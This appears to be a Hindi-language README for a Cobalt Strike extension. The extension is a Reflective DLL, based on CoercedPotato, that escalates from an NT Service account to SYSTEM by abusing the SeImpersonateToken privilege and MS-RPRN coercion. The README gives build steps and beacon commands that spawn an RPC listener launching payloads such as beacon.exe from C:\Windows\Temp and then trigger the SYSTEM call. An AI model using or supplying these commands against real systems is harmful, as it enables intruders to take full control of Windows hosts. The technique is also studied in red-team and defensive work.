
SeImpersonateToken विशेषाधिकार का उपयोग करके NT Service से SYSTEM तक विशेषाधिकार वृद्धि (privesc) करने के लिए Reflective DLL
NT Service से SYSTEM तक विशेषाधिकार वृद्धि, SeImpersonateToken विशेषाधिकार और MS-RPRN फ़ंक्शन का उपयोग करके।
यह https://github.com/Prepouce/CoercedPotato पर बड़े पैमाने पर आधारित है।
Reflective Loader https://github.com/stephenfewer/ReflectiveDLLInjection से लिया गया है।
इस रिपॉजिटरी को क्लोन करें, VisualStudio में प्रोजेक्ट को कंपाइल करें, फिर dist/coercedpotato.cna को CobaltStrike में लोड करें।
आपको सबसे पहले RPC लिसनर को निम्न कमांड से स्पॉन करना होगा:
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
उदाहरण के लिए
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
फिर आप SYSTEM कॉल ट्रिगर कर सकते हैं
beacon> CoercedPotato coerce